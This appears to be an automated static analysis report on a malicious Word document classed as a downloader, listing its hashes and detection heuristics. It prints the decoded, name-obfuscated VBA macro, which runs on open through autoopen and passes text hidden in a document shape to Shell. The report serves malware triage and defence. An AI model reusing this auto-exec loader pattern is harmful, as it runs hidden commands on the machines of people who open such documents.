Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 2f57ea9c2b9eb385…

MALICIOUS

Office (OLE)

100.4 KB Created: 2018-12-11 03:58:00 Authoring application: Microsoft Office Word First seen: 2019-12-09
MD5: 0a6674742893a1d1fdd957436d470e28 SHA-1: bba6699290721b85881b80d7b75d9f70dcd3fefd SHA-256: 2f57ea9c2b9eb385b5cd1841ef8ae511928169ddcc164fbc65cea0bcabf63c55
292 Risk Score

Heuristics 10

  • ClamAV: Doc.Downloader.Generic-6780013-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Generic-6780013-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    PBEMwhsQjGfksuqZLNBMiz = CUZbbzpoPFuYQV
aUrzalbo = Array(rPHfjRFS, CsYGRRqRQ, wVaDvYa, Shell(ScLrv, EzmHn), rzdQslojk)
   jXIFpRsVvvvXSXW = cObnzhYdCVtzzn
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Attribute VB_Customizable = True
Sub autoopen()
TdzZc
  • Suspicious cmd.exe invocation with execution flag high SC_STR_CMD
    Suspicious cmd.exe invocation with execution flag
  • Reference to PowerShell high SC_STR_POWERSHELL
    Reference to PowerShell
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.iec.ch In document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4265 bytes
SHA-256: 6c508a733a0755379a8d75ad98039c661d73cdf1e4a32b86d0f442513f1f0e33
Detection
ClamAV: No threats found
Obfuscation or payload: likely
155 of 195 identifiers look randomly generated (e.g. 'rquOzdownaPBAmEXWRwkCrHZ') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "LLDKchlpXTNu"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub autoopen()
TdzZc
End Sub

Attribute VB_Name = "kzbNrWE"
Function TdzZc()
On Error Resume Next
   fKIFuQTDPAdwuNB = jjjftMSXJHJaZcqWCLrpCYnz
GuLusoBFIGzcfN = rlwmGsdnJHtjVLsKvh
mSGcQSIVRVruXzYwRcAt = dGCnwFftPwEvAbA
   qizQTiaJCSJbCulpaaXldStX = EzEfwVwaNBlMpHRZEo
LZWhZVScIfUYlZvPlWiDwKB = sAckTGMZdCMvhPfJftqusd
musfDZkuAXjoYt = JCTuuiNAhVqUYDUHzPApq
   LiuwOdkXkYibXdkNP = PazijtYoAHQsVjj
qJLzihfzrksfQtR = JUXOQdzBZadcGr
BsSmbBQdiuCqwB = YGqOjAJVoNLKZEDDqzhqnzH
   OJHiRojTNHVvKrfOAOZARl = sksVUOpsuwMLdqrFi
piZZqGwEMbGJiXcuPuZTL = YObwwjBXIJqTbDo
tmXQBNmkRoijbzfPVk = KzsISDpTwSLwZGvA
   QnZaQnpPOjFXKsvPpfkbSlV = sndAFwkirpkvhlihviu
mqunjKKdFGYiRAhdKoJRz = fVIAiDzCjormmBtpUvm
ZkQFdjDEXHUdkLK = ffbGfCajnfNfkVTOirB
   fGRCiLHAMRChqYRiP = BmXAkjrpouSKOATKWWOs
sSSTOzzsrflBSt = siViKtWMiBDCOjCuPWdITFh
lszzOhJwHYRrAfhGVF = RLvkLpkViokbnzzwSwZwB
   RMjcdtwTpIJDVEQNkiDH = KGSowMMVmUMBGZwCVqttpK
VwhqmznlWopGGOnhh = wCowBOfUKPoKNwAnzsOWZX
ipNRSpohIMGrHiYuSLSnXzMa = GTQuSKNbDFGozMiWhfzHHtJ
   pGKKRUpOzYtkPtAZLrFlr = qMocnZopZiLNLcF
intKFbBMPzkRFF = hqjPzVohQaJwKZC
YULMSsjAOLcNpoXjUaiWb = HiqFcjvdrnNPMwus
   siJAkNWcYMfPTDb = zdkCAEROAsuHzOQil
wQQbqcFHRBMvBinv = DlzGnQvArSPdJv
iGGKBXmIzsnQBErMTDNNznGJ = UawJpdHFQRvbct
Set wLHkblcna = LLDKchlpXTNu.Shapes(WYnqBt + "dPwOtbuMCrs" + DYRFUw).TextFrame
   nEzzfTucTFrWYkD = mmYpAQhfAuRDVuZSOfToiPn
rquOzdownaPBAmEXWRwkCrHZ = ZHtQPPXwYwKWSjWGUQui
RcavRNSDzAiUjaWujXL = DcnuBDlZihaMuHHfSUzBEub
   wMfOMODBZJwQCfHiMuMii = AwifBAPXvjdnjjii
krkQwrSRioOIdamGi = jjhMCmBNNmOwaDdc
qtzCGLNTMAORIrhwVwz = YpwOkijDjNKfBzvMlJZYT
   UCltcaARKSOkpPrzNnErW = WrikVrIzHcMaGbnYjqA
jcFVmkioOtpmMwj = LrFIIMLlYOJQMpDNrNoumMz
NUiOnZOKutMskrAWQUzXb = cZpbvwHlGwtVvoiz
   wtJJrvDfvzLntjDcYCjGcDu = BqkhINAEKUbhGVHQYIdlLv
YwfXshvPtzWIALWXi = GdYEVWDvSiTaIcFbLicpIXOF
ikMGFClumFRqUdJUwONvT = uCZznutpiOTWmmqoMfifVWn
   LVLYFaHmJjcSazLozNt = wTGWssSoBBqkrjbmpRNZNsQ
QPDHbcqYjpdrOofMISlHs = aqXYzizUfEDYGdpLMYKSDBG
YBlBRvHIqXoMjDdIZMKZn = hCXwFMzaoZknAwzwCkwvhio
   ZAfFPqRhQEFYUUiAscOimjYG = AwGbfZGrznuoqBFPPRwku
tmhBaWiMsbZVPtLG = fwjUhnLCaISXPaVppCUti
jInuTPUmMEIjTlOqMwVzzOPp = BDjaqrMGfPXjmUwhowOO
ScLrv = wLHkblcna.ContainingRange + SULIB + spJjFP + zWDWz + iIChNn + OoIicZ + MJHuwjH + rfYAkO
   cDFEtBEQTtDLEbTawQTiM = tsczAKazLkljsEqSlXKEN
WInlLvhVwaXvKMbuBtpVhS = YiPjdfvYIUEVULOwiQq
KIztiqrWQOrHDjOCvMDpAC = aGrHimvLFqdOQlWFn
   OqPYMPFzujwUkj = RddWnnliwWhLQNooS
YrBFijBjlMVMPqlKzwI = tQdHRBfDomGudtLpQMzuU
CYNlGqaGNpjhhH = tncEwuwGajWivtmz
   bIYYuLjJLfcjkwsdZi = wVjiLJNCjvkzQwoLuPbC
hilSaALRLACTiX = saMPjIzOafMjwn
OwjiOqwPlIClUuhjiZmSTCMV = hQKnOQOdOmEnDILuKbGdXfU
   FYOjSEfpmrrfrQwudLzwLN = acNMXIbJtajOaDpnLW
HiFihFnjQhvrisBnHErHhL = wFIBXqnYlbYFsUwjHkbLc
iFWZPhiUPFwwHYZEPqcIKPFm = TJYkXFAFzWCfwaF
   uidhfhUTNFGXli = VLAvPNHCrotCpi
FvwSiilpnLiSPHzMfDzz = kQoqnjmtmifoiAK
SzVjWNjhururbNzpiYU = KcqCwwBhDdjHonNDiQjX
   UWNcYtfLlIdKdwWzZvi = KRXRpaBwccZPalKpMO
XMiYrdXmWpcQRHqPDzwmwsh = IiOkrojkLBHGcsjnSofIA
IHjVGqQbvffzPIPm = hIrEPAkmKTIUKNYhvaGAWiq
   MWXurqoEvspKIjWtqEiaI = ATqVjfaovquOvGRPWNKOI
TYoZnczMumcbWEDWGIdGwwQ = kPcahQPucJzShKswpjwIlUk
LAHCkBtUIuoYAYid = izMElowQfRNBIIQiPP
   lTNcUJTLIoOtVwhlnjhqZO = WSVDisjAJkkNwJspPpz
HWvuQsnAwSLNXtqJzGl = coFIklicutRAcoTAWa
pFfBqZXpFTjpJDiwSQnJfJ = GEAKliZqmYTvNwmO
   YTaowfPnRojsThiUXwsiwz = zQHWsJdswcrdlV
kWfNbZHwEZYmpQassbRbYpJW = nviPcEtwbOVwjWcsRCwU
ocXjwCTuWvNJjndZjc = inNCFuJEpjHnNBGwTK
Const EzmHn = 0
   VwaFpiMJBwaNHHwcdwajwJ = qWjYjdjcmiTcWiTjOMRAb
UsBkuczjXqLNkiFKcj = WojoictJMMWjJIUCrW
jEcFGcQIwldDjlfFhlEWIASm = AJCEPjOndwRtjcLNTv
   PbnmNfDwVszPNTTsjHPr = GtrCfrlYtFqCFpnbUaiIzn
JYqbkTjGIKoIhw = ioRacnIMIdjQMjhioTthd
PBEMwhsQjGfksuqZLNBMiz = CUZbbzpoPFuYQV
aUrzalbo = Array(rPHfjRFS, CsYGRRqRQ, wVaDvYa, Shell(ScLrv, EzmHn), rzdQslojk)
   jXIFpRsVvvvXSXW = cObnzhYdCVtzzn
hBJcowAkwZzpEru = JlIEbhbJCzfDTYtWI
OVJvhCcdfNBsTlIGkNqifz = AaoTzRYjbhQcYGNEFcw
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.